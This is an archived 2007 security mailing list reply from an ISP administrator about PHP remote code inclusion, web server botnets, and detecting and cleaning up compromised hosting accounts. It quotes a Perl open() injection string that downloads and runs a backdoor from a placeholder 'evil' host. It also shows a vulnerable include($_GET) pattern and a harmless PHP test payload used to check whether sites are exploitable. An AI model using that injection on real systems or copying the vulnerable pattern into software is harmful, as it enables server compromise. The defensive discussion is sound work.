lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20070220155958.GE2979@1und1.de>
Date: Tue, 20 Feb 2007 16:59:58 +0100
From: Anders Henke <anders.henke@...d1.com>
To: Gadi Evron <ge@...uxbox.org>
Cc: botnets@...testar.linuxbox.org, bugtraq@...urityfocus.com,
	full-disclosure@...ts.grok.org.uk
Subject: Re: Web Server Botnets and Server Farms as Attack Platforms

On Feb 12th 2007, Gadi Evron wrote:
> Most web servers are being compromised by these attacks as a result of an
> insecure web application written in PHP, although attacks for other
> scripting languages such as Perl and ASP are also in-the-wild.
> 
> The main reason for this is that many different PHP applications are
> available online, and often freely as open source, which makes them a
> popular selection for use on many web sites. Another reason for the
> popularity of attacks against PHP applications is that writing securely in
> PHP is very difficult, which makes most of these PHP applications
> vulnerable to multiple attacks, with hundreds of new vulnerabilities
> released publicly every month.

An important issue with this is that many people "learn" PHP by looking
at existing (free) software - and porting exactly those bugs into their
own applications or even bring those bugs to different platforms: vulns 
found and possibly fixed in some optional phpbb/nuke plugin years ago
can be found in quite current releases of some nuke/phpbb-spinoff.

A few years ago, attackers focussed on Perl code, specifically against
insecure usage of the open() call:

open IN,$some_var_from_webserver;

Populate $some_var_from_webserver with a trailing " |", e.g.
"; wget http://evil/backdoor.pl ; chmod +x backdoor.pl ; ./backdoor.pl |" 
and you've found your way to execute shell code on the remote web server.

The vulnerabilities are still there, but most current attackers have shifted 
over to PHP remote code inclusion. So the basic problem isn't new and
doesn't affect the exact language.

Over the first few years of PHP remode code inclusion, most people
pointed that the "register_globals" were the problem: to globally
register any variable used in the URI and distribute it to the script.
>From my own perspective, I've quite often seen customer's selfwritten
PHP code using things like

include($_GET["var"]);

... circumventing any security illusioned by a disabled register_globals.

On the other side, the behaviour of most "legacy" code changes that
dramatially (read: it doesn't work anymore) so that exactly those
applications will fail if you disable register_globals years after
those scripts were put in place. The way to notify your customers that
you'll be turnung off register_globals in some months is a guarantee
to flood your support help desk with people who can't remember wether
they're affected or not - and if, how exactly to fix it.

The hard way were to disable the include_url_open-Wrapper for all
customers - but this will remove some required php-functionality
(at least for more then enough customers) and those scripts are no
longer remote-, but still to some extent locally exploitable
(user A on same server as user B puts some file to /tmp and asks
 the script via HTTP to include and execute it under B's permissions).
Something is gained, much is lost, but the problem still isn't solved?

Yet another way were to redirect all outgoing connections from PHP
to a transparent proxy, scanning for certain "typical" URLs or domains
you won't accept. A request for some .gif-file hosted on geocities, but
with an appended CGI-parameter, e.g. something like 
'GET /dir/cmd.gif?common.php HTTP/1.0' is something worth to deny,
as that's a current scheme of remote code inclusions.

> While in the past botnets used to be composed of mainly broadband end
> users running Windows, today we can see more and more server botnets we
> can refer to as "IIS botnets" or "Linux botnets" as a direct result of
> these attacks.
> 
> One of the conclusions we reached was that although the technologies used
> are not new (RFI, PHP shells, etc.) the sheer scale of the problem is
> what's interesting.

In another message below this thread, Tom wrote that he had been chasing
e.g. formmail-related exploits since 1995. Well, I'm working as a system
administrator for an ISP and have been chasing similar scripts as well.

However, there's no golden bullet to find those scripts and you're
always behind the reality.

MD5-Hashes don't work. Users change comments, add lines, etc. and
the bugs are usually found in both "official" releases as well as
branched releases with new names (of course with new headers).
Users upload script files as binary with broken line feeds, reformated
umlauts or special characters, some people hardcode subject lines
or change different things, so scanning for the MD5-sum of a certain
code fragment or a few "usual" lines doesn't work well enough.

Signatures don't work. Users do transcript scripts from one language
into a different one. For example, I've had formmail-scripts being
ported from perl to php: the code has been transcribed about line by line,
including all names for variables and so on, but still including the
same vulns.

About the only thing which seems to work is actually trying to exploit
it with some "harmless" code, e.g. some RCI-included script printing
a message like this:

---cut
<p><pre>
<?php
system("echo exploit tested successfully | md5sum");
?>
</pre></p>
---cut

If the PHP-parsed page contains the string 
"f2ab69ebe7311e7fb16898a5cc17ae05" (in this example), it is quite likely 
that the site's script is really exploitable. Write a parser to extract
all variables from a PHP script and force-feed the PHP-script with all
those variables set to your local testing url: you've got your epxloit
checker.

For mail-sending vulns: one of my formmail scanners is trying to
send mail to some /dev/null-adress, along with some specific content
which is discarded from the MTA regardless of the receiving adress,
this in about 9 variants of different parameter encoding and naming 
conventions, but after all, they do catch more than 98% of vulnerable 
scripts now. Still not perfect, but more likely the way to go than
scanning for "FormMail 1.6 by Matt Wright" if the "masterscript
collection" contains a 100% compatible replacement reusing the same bugs.
 
> In our research as detailed in the Virus Bulletin article we recognize
> that vulnerabilities such as file inclusion, as simple as they may be, are
> equivalent to remote code execution in effect.
> 
> Although escalation wars, which are reactive in nature, are a solution we
> hate and are stuck with on botnets, spam, fraud and many other fronts,
> this front of web server attacks stands completely unopposed and
> controlled by the bad guys. In our research we detail how over-time, when
> aggregated, most attacks come from the same IP addresses without these
> ever getting blocked.
> 
> ISPs and hosting farms selling low-cost hosting services can not cope with
> this threat, especially where an attack against one user running such an
> application can compromise a server running 3000 other sites.

This depends on the term of "low-cost hosting services". 
There are ISPs who are also running PHP-content only via suexec under each 
single users permissions within tightly configured chroot jails, so from 
server level, only the single customers space has been exploited.

Of course, from the outside view you're still seeing traffic from or to 
the same box hosting 3000 different other sites and can't distinguish wether 
it has been cleaned after a compromise, but it's important for the ISP to 
know the difference between "box compromised, needs to be reinstalled from 
scratch" and "single customers space compromised, all malware can be found
in users $HOME or /tmp, processes killed by EUID".

Of course, your shared hosting server uses incoming =and= outgoing 
firewalling to restrict potential damage as well as alert you from 
any traffic spikes; e.g. a web server should only be able to contact 
53/udp at your own dns resolvers and you disallow incoming tcp connections 
to port ranges where you won't operate a service; including ports > 1024.

At least we're automatically scanning for certain behaviours of
backdoor shell scripts and exploited spaces, automatically locking them
down and alerting the support staff to contact the matching customer,
and I don't think that this were such a rocket science that only we'd 
do so. 

I'm aware of the fact that all those attempts are far from perfect and 
with knowledge on what exactly I'm scanning for most bugtraq readers should
be able to circumvent my scanners, but these scanners are currently catching 
those bad scripts being "in the wild" quite effectively.

Some process is listening to an arbitary tcp port, disguises
in the process listing as "syslogd", but /proc/$pid/exe points to a file
under the document root from a customer? Well, you've found 
yet another generic backdoor process.
-dump the processes running environment and block incoming TCP connections 
 from or to $HTTP_REMOTE_ADDR
-run memfetch against the process to dump its current data and code into
 your local filesystem for later analysis. You don't have to gdb it -
 a simple "strings"-command on the fetched files shows you more than
 enough signs of wether it is some malware or not.
-in doubt: kill the process.
-if you're certain that the process is bad (it usually is ...),
 disable the abused script - URL/Scriptname can be found in the
 environment, chmod 000 is your own job.
-be sure to clean up users crontabs; many backdoors ("y2kupdate")
 install user cronjobs to restart the backdoor automatically.
-alert user or help desk of what you've done and why you've done this.


If you're scripting this knowledge into a regular cron job,
matching your own servers exact specifications, you've found
at least some very effective way to limit possible damage.



Regards,

Anders
-- 
1&1 Internet AG              System Administration and Security

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ